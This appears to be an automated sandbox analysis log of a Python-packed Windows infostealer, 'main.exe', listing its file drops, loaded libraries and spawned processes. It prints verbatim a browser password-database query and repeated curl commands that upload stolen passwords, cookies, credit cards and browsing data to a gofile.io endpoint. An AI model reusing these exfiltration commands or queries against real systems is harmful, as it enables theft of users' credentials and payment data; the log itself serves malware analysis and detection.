            Source: C:\Users\user\Desktop\main.exe Code function: String function: 00007FF733391E50 appears 53 times
            Source: unicodedata.pyd.0.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: _overlapped.pyd.0.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: python3.dll.0.dr Static PE information: No import functions for PE file found
            Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_hashlib.pyd. vs main.exe
            Source: main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_bz2.pyd. vs main.exe
            Source: main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_asyncio.pyd. vs main.exe
            Source: main.exe, 00000000.00000003.1752729643.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewin32ui.pyd0 vs main.exe
            Source: main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_lzma.pyd. vs main.exe
            Source: main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_multiprocessing.pyd. vs main.exe
            Source: main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_elementtree.pyd. vs main.exe
            Source: main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_overlapped.pyd. vs main.exe
            Source: main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_decimal.pyd. vs main.exe
            Source: main.exe, 00000000.00000003.1753127586.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dllT vs main.exe
            Source: main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_ctypes.pyd. vs main.exe
            Source: main.exe, 00000000.00000003.1753253644.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140_1.dllT vs main.exe
            Source: main.exe, 00000002.00000002.2015409411.000001E891430000.00000002.00000001.01000000.00000006.sdmp Binary or memory string: OriginalFilenamepython3.dll. vs main.exe
            Source: classification engine Classification label: mal92.troj.spyw.winEXE@40/137@2/2
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802
            Source: main.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Users\user\Desktop\main.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SELECT action_url, username_value, password_value FROM logins;
            Source: main.exe ReversingLabs: Detection: 15%
            Source: main.exe Virustotal: Detection: 23%
            Source: C:\Users\user\Desktop\main.exe File read: C:\Users\user\Desktop\main.exe
            Source: unknown Process created: C:\Users\user\Desktop\main.exe "C:\Users\user\Desktop\main.exe"
            Source: C:\Users\user\Desktop\main.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\main.exe Process created: C:\Users\user\Desktop\main.exe "C:\Users\user\Desktop\main.exe"
            Source: C:\Users\user\Desktop\main.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
            Source: C:\Users\user\Desktop\main.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Users\user\Desktop\main.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
            Source: C:\Users\user\Desktop\main.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path softwarelicensingservice get OA3xOriginalProductKey"
            Source: C:\Users\user\Desktop\main.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path softwarelicensingservice get OA3xOriginalProductKey
            Source: C:\Users\user\Desktop\main.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
            Source: C:\Users\user\Desktop\main.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
            Source: C:\Users\user\Desktop\main.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
            Source: C:\Users\user\Desktop\main.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Users\user\Desktop\main.exe Process created: C:\Users\user\Desktop\main.exe "C:\Users\user\Desktop\main.exe"
            Source: C:\Users\user\Desktop\main.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Users\user\Desktop\main.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
            Source: C:\Users\user\Desktop\main.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path softwarelicensingservice get OA3xOriginalProductKey"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
            Source: C:\Users\user\Desktop\main.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\main.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\main.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\main.exe Section loaded: vcruntime140.dll
            Source: C:\Users\user\Desktop\main.exe Section loaded: libffi-8.dll
            Source: C:\Users\user\Desktop\main.exe Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\main.exe Section loaded: vcruntime140_1.dll
            Source: C:\Users\user\Desktop\main.exe Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\main.exe Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\main.exe Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\main.exe Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\main.exe Section loaded: secur32.dll
            Source: C:\Users\user\Desktop\main.exe Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\main.exe Section loaded: libcrypto-3.dll
            Source: C:\Users\user\Desktop\main.exe Section loaded: libssl-3.dll
            Source: C:\Users\user\Desktop\main.exe Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\main.exe Section loaded: wbemcomn.dll
            Source: C:\Users\user\Desktop\main.exe Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\main.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\main.exe Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\main.exe Section loaded: sxs.dll
            Source: C:\Users\user\Desktop\main.exe Section loaded: powrprof.dll
            Source: C:\Users\user\Desktop\main.exe Section loaded: pdh.dll
            Source: C:\Users\user\Desktop\main.exe Section loaded: umpdc.dll
            Source: C:\Users\user\Desktop\main.exe Section loaded: wtsapi32.dll
            Source: C:\Users\user\Desktop\main.exe Section loaded: sqlite3.dll
            Source: C:\Users\user\Desktop\main.exe Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\main.exe Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\main.exe Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\main.exe Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\main.exe Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\main.exe Section loaded: cryptbase.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
            Source: C:\Windows\System32\curl.exe Section loaded: secur32.dll
            Source: C:\Windows\System32\curl.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\curl.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\curl.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\main.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
            Source: main.exe Static PE information: Image base 0x140000000 > 0x60000000
            Source: main.exe Static file information: File size 27577634 > 1048576
            Source: main.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: main.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: main.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: main.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: main.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: main.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: main.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: main.exe, 00000000.00000003.1753253644.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: bossl-modules\legacy.pdb0 source: main.exe, 00000000.00000002.2031067300.0000024BCD638000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2015446644.000001E891469000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: bossl-modules\legacy.pdb source: main.exe, 00000000.00000002.2031067300.0000024BCD638000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2015446644.000001E891469000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: main.exe, 00000000.00000003.1753127586.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: main.exe, 00000000.00000003.1753127586.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: main.exe, 00000002.00000002.2015409411.000001E891430000.00000002.00000001.01000000.00000006.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: main.exe, 00000000.00000003.1753253644.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
            Source: main.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: main.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: main.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: main.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: main.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: VCRUNTIME140_1.dll.0.dr Static PE information: 0xFB76EAA0 [Mon Sep 10 13:35:28 2103 UTC]
            Source: libcrypto-3-x64.dll.0.dr Static PE information: section name: .00cfg
            Source: libcrypto-3.dll.0.dr Static PE information: section name: .00cfg
            Source: libssl-3.dll.0.dr Static PE information: section name: .00cfg
            Source: legacy.dll.0.dr Static PE information: section name: .00cfg
            Source: mfc140u.dll.0.dr Static PE information: section name: .didat
            Source: VCRUNTIME140.dll.0.dr Static PE information: section name: fothk
            Source: VCRUNTIME140.dll.0.dr Static PE information: section name: _RDATA
            Source: python311.dll.0.dr Static PE information: section name: PyRuntim

            Persistence and Installation Behavior

            Source: C:\Users\user\Desktop\main.exe Process created: "C:\Users\user\Desktop\main.exe"
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_ARC4.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_hashlib.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_eksblowfish.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_Salsa20.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_asyncio.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\zstandard\_cffi.cp311-win_amd64.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_overlapped.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_lzma.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA1.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin\win32ui.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\libffi-8.dll
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Protocol\_scrypt.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_socket.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_chacha20.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_cbc.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_keccak.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA256.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\unicodedata.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_ghash_clmul.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_MD5.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_ctypes.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_cffi_backend.cp311-win_amd64.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_decimal.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ecb.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\ossl-modules\legacy.dll
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_pkcs1_decode.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_cast.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_poly1305.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_webp.cp311-win_amd64.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_des3.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_BLAKE2s.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\zstandard\backend_c.cp311-win_amd64.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_BLAKE2b.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography\hazmat\bindings\_rust.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_RIPEMD160.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_curve448.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\select.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin\mfc140u.dll
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ofb.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_curve25519.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_des.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_ghash_portable.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_uuid.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\win32\_win32sysloader.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_aes.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\python3.dll
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_ec_ws.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imagingcms.cp311-win_amd64.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_blowfish.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_arc2.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ocb.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_MD2.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\psutil\_psutil_windows.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\VCRUNTIME140_1.dll
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Math\_modexp.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_brotli.cp311-win_amd64.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imaging.cp311-win_amd64.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\sqlite3.dll
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_elementtree.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Util\_strxor.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imagingtk.cp311-win_amd64.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\markupsafe\_speedups.cp311-win_amd64.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32\pywintypes311.dll
